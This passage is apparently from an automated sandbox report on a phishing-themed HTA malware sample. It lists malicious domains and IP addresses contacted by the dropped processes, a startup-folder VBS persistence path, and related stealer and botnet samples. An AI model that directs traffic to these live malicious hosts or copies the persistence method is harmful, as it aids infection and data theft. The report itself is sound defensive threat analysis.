                                                                            		high
                                                                            http://npukfztj.biz/hwjtljgqnsqgbcfalse
                                                                              		high
                                                                              https://reallyfreegeoip.org/xml/8.46.123.228false
                                                                                		high
                                                                                http://przvgke.biz/jenypfalse
                                                                                  		high
                                                                                  http://fwiwk.biz/afalse
                                                                                    		high
                                                                                    http://pywolwnvd.biz/lffalse
                                                                                      		high
                                                                                      http://przvgke.biz/widfafwxfswrijfalse
                                                                                        		high
                                                                                        http://pywolwnvd.biz/hxfalse
                                                                                          		high
                                                                                          http://vjaxhpbji.biz/vipfalse
                                                                                            		high
                                                                                            http://lpuegx.biz/vtrrtopftfalse
                                                                                              		high
                                                                                              http://saytjshyf.biz/bkqfalse
                                                                                                		high
                                                                                                http://knjghuig.biz/rqfalse
                                                                                                  		high
                                                                                                  http://cvgrf.biz/hluumowlkjhsxefalse
                                                                                                    		high
                                                                                                    http://pywolwnvd.biz/nwqffalse
                                                                                                      		high
                                                                                                      http://ifsaia.biz/lapsfalse
                                                                                                        		high

                                                                                                        URLs from Memory and Binaries

                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                        http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590alg.exe, 00000003.00000003.1893965929.000000000069B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        http://82.112.184.197:80/vtrrtopftalg.exe, 00000003.00000003.2189424613.0000000000667000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881alg.exe, 00000003.00000003.2321824408.0000000001590000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://18.141.10.107/rqalg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://54.244.188.177:80/irtgqxbqsqyophmbix.exe, 00000001.00000002.1738442951.0000000000C21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://ww99.przvgke.biz/widfafwxfswrijualg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          http://54.244.188.177/irtgqxbqsqyophmbLx.exe, 00000001.00000002.1738442951.0000000000C11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://54.244.188.177/lfualg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://18.141.10.107:80/ralg.exe, 00000003.00000003.1794290607.0000000000667000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://18.141.10.107/alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.google.comalg.exe, 00000003.00000003.1893965929.000000000069B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.dropbox.com/oauth2/authorizealg.exe, 00000003.00000003.1840894790.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://44.221.84.105/hwjtljgqnsqgbcsalg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://ww99.przvgke.biz/widfafwxfswrijalg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2410675571.0000000000695000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1966234277.0000000000690000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://www.dropbox.com/oauth2/authorizeInvalidBrowserSettingsBrowserCreationFailedInvalidRenderHandalg.exe, 00000003.00000003.1840894790.0000000001450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://54.244.188.177/3?x.exe, 00000001.00000002.1738442951.0000000000C03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://54.244.188.177/x.exe, 00000001.00000002.1738442951.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1738442951.0000000000C21000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://54.244.188.177/lfalg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1770456267.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://44.221.84.105/alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://82.112.184.197:80/dmksqnbsalg.exe, 00000003.00000003.2412274626.0000000000667000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.0000000000667000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://18.141.10.107/qs#qalg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1alg.exe, 00000003.00000003.2321824408.0000000001590000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://54.244.188.177/irtgqxbqsqyophmb&x.exe, 00000001.00000002.1738685341.0000000000C42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://18.141.10.107/qalg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://54.244.188.177/?qalg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395alg.exe, 00000003.00000003.2189424613.000000000068B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        		unknown
                                                                                                                        http://www.autoitscript.com/autoit3/alg.exe, 00000003.00000003.2415308900.00000000004A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://54.244.188.177/7qalg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://ww99.przvgke.biz/jenypalg.exe, 00000003.00000003.1933405508.000000000067B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2410675571.0000000000695000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1966234277.0000000000690000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          http://54.244.188.177/kqPalg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://44.221.84.105/hwjtljgqnsqgbcalg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://54.244.188.177/irtgqxbqsqyophmbx.exe, 00000001.00000002.1738685341.0000000000C42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizalg.exe, 00000003.00000003.1924055176.0000000001530000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://82.112.184.197/alg.exe, 00000003.00000003.2410675571.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            13.248.148.254
                                                                                                                            		084725.parkingcrew.netUnited States
                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                            104.21.67.152
                                                                                                                            		reallyfreegeoip.orgUnited States
                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                            44.221.84.105
                                                                                                                            		saytjshyf.bizUnited States
                                                                                                                            		14618AMAZON-AESUSfalse
                                                                                                                            54.244.188.177
                                                                                                                            		pywolwnvd.bizUnited States
                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                            193.122.130.0
                                                                                                                            		checkip.dyndns.comUnited States
                                                                                                                            		31898ORACLE-BMC-31898USfalse
                                                                                                                            72.52.179.174
                                                                                                                            		ww99.przvgke.bizUnited States
                                                                                                                            		32244LIQUIDWEBUSfalse
                                                                                                                            199.59.243.227
                                                                                                                            		76899.bodis.comUnited States
                                                                                                                            		395082BODIS-NJUSfalse
                                                                                                                            13.251.16.150
                                                                                                                            		ifsaia.bizUnited States
                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                            47.129.31.212
                                                                                                                            		xlfhhhm.bizCanada
                                                                                                                            		34533ESAMARA-ASRUfalse
                                                                                                                            172.234.222.138
                                                                                                                            		przvgke.bizUnited States
                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                            82.112.184.197
                                                                                                                            		vjaxhpbji.bizRussian Federation
                                                                                                                            		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                            18.141.10.107
                                                                                                                            		ssbzmoy.bizUnited States
                                                                                                                            		16509AMAZON-02USfalse

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1566438
                                                                                                                            Start date and time:2024-12-02 07:55:09 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 13m 11s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:27
                                                                                                                            Number of new started drivers analysed:3
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:Ziraat_Swift.hta
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.spre.troj.spyw.expl.evad.winHTA@28/149@27/12
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 72%
                                                                                                                            • Number of executed functions: 66
                                                                                                                            • Number of non-executed functions: 255
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .hta

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            01:56:04API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                                                            01:56:09API Interceptor15x Sleep call for process: alg.exe modified
                                                                                                                            06:56:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            13.248.148.254http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                            • ww38.begantotireo.xyz/favicon.ico
                                                                                                                            http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                            • ww38.begantotireo.xyz/favicon.ico
                                                                                                                            http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                                                                                                                            • ww38.watchdogsecurity.online/favicon.ico
                                                                                                                            65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                                                                                            • ww12.icodeps.com/?usid=26&utid=7334446481
                                                                                                                            eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • ww38.fmoovies.to/
                                                                                                                            http://www.multipool.usGet hashmaliciousUnknownBrowse
                                                                                                                            • ww12.multipool.us/track.php?domain=multipool.us&caf=1&toggle=answercheck&answer=yes&uid=MTcyMDYyMjM5MS4yMjM1OjVjOTE5YWZmN2E1ZDQyNWY5MDE0Nzg0YzIwZGI1NzNiMGZkYzI3MWFiMWE0MGU0NzBjYjkyZjk4MmNlNjdjZDI6NjY4ZTlkMzczNjkwYg%3D%3D
                                                                                                                            http://pollyfill.ioGet hashmaliciousUnknownBrowse
                                                                                                                            • ww38.pollyfill.io/favicon.ico
                                                                                                                            http://simxtrackredirecttszz.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                            • ww12.ngelit.com/favicon.ico
                                                                                                                            file.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                            • ww12.runfoxyrun.com/administrator/index.php?usid=18&utid=25958170171
                                                                                                                            http://dohigu.comGet hashmaliciousUnknownBrowse
                                                                                                                            • ww12.dohigu.com/favicon.ico
                                                                                                                            104.21.67.152MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  ZM-Z_2024-000343__SKM-0_000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    RECEIPT DATED 28.11.2024,pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      drawing 10023. spec T4 300W .... dimn 560horsepower po 1198624 _ %00% spec .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          hesaphareketi-01-27112024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                              QUOTE 6935100428170.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                44.221.84.105invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • jhvzpcfg.biz/tgcwttfqletfhyq
                                                                                                                                                Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • hehckyov.biz/ircdert
                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • hehckyov.biz/xc
                                                                                                                                                PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • saytjshyf.biz/xyvnmtdiyfgocm
                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • jhvzpcfg.biz/qehuuaxgtrfd
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • hehckyov.biz/of
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • hehckyov.biz/sdgvcmfo
                                                                                                                                                8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                • gahyhiz.com/login.php
                                                                                                                                                7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                • vocyzit.com/login.php
                                                                                                                                                UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                • vocyzit.com/login.php

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                przvgke.bizRFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 172.234.222.138
                                                                                                                                                invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 172.234.222.143
                                                                                                                                                Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 172.234.222.143
                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 172.234.222.143
                                                                                                                                                PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 172.234.222.143
                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 172.234.222.143
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 172.234.222.143
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 172.234.222.138
                                                                                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                • 172.234.222.143
                                                                                                                                                E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                • 172.234.222.138
                                                                                                                                                ssbzmoy.bizRFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                76899.bodis.comhttp://readabilityscore.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 199.59.243.226
                                                                                                                                                http://bonalluterser.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                • 199.59.243.226
                                                                                                                                                file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                • 199.59.243.225
                                                                                                                                                S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                • 199.59.243.225
                                                                                                                                                xPUqa4qbDL.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                • 199.59.242.153
                                                                                                                                                knjghuig.bizinvoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                • 18.141.10.107
                                                                                                                                                E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                • 18.141.10.107

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                CLOUDFLARENETUShttps://activationmail-setupmailvalidationonlineaaosaiaosuaos.es/all/?e=bWpiQGhvbWVwYWdlYXBpLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                                                                                                                • 172.67.165.166
                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.16.9
                                                                                                                                                UolJwovI8c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.74.149
                                                                                                                                                PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                • 188.114.97.6
                                                                                                                                                PO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                • 188.114.97.6
                                                                                                                                                http://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.16.123.96
                                                                                                                                                ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                • 172.67.145.234
                                                                                                                                                file.exeGet hashmaliciousAmadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                • 172.67.165.166
                                                                                                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 1.4.51.14
                                                                                                                                                AMAZON-AESUShttp://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                • 52.203.8.108
                                                                                                                                                file.exeGet hashmaliciousAmadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                • 18.213.123.165
                                                                                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 18.210.239.2
                                                                                                                                                Original CI PL.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                • 107.23.200.217
                                                                                                                                                teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 44.198.41.66
                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 3.223.200.11
                                                                                                                                                sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.62.131.206
                                                                                                                                                sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.42.39.86
                                                                                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 18.207.157.33
                                                                                                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.135.193.72
                                                                                                                                                AMAZON-02UShttp://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                • 63.33.81.165
                                                                                                                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.171.230.55
                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.171.230.55
                                                                                                                                                teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 54.214.255.210
                                                                                                                                                teste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 54.78.26.72
                                                                                                                                                teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                • 18.221.123.44
                                                                                                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 35.75.100.92
                                                                                                                                                sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 18.137.217.254
                                                                                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 108.148.111.224
                                                                                                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.110.214.166
                                                                                                                                                AMAZON-02UShttp://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                • 63.33.81.165
                                                                                                                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.171.230.55
                                                                                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.171.230.55
                                                                                                                                                teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 54.214.255.210
                                                                                                                                                teste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                • 54.78.26.72
                                                                                                                                                teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                • 18.221.123.44
                                                                                                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 35.75.100.92
                                                                                                                                                sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 18.137.217.254
                                                                                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 108.148.111.224
                                                                                                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 54.110.214.166

                                                                                                                                                JA3 Fingerprints

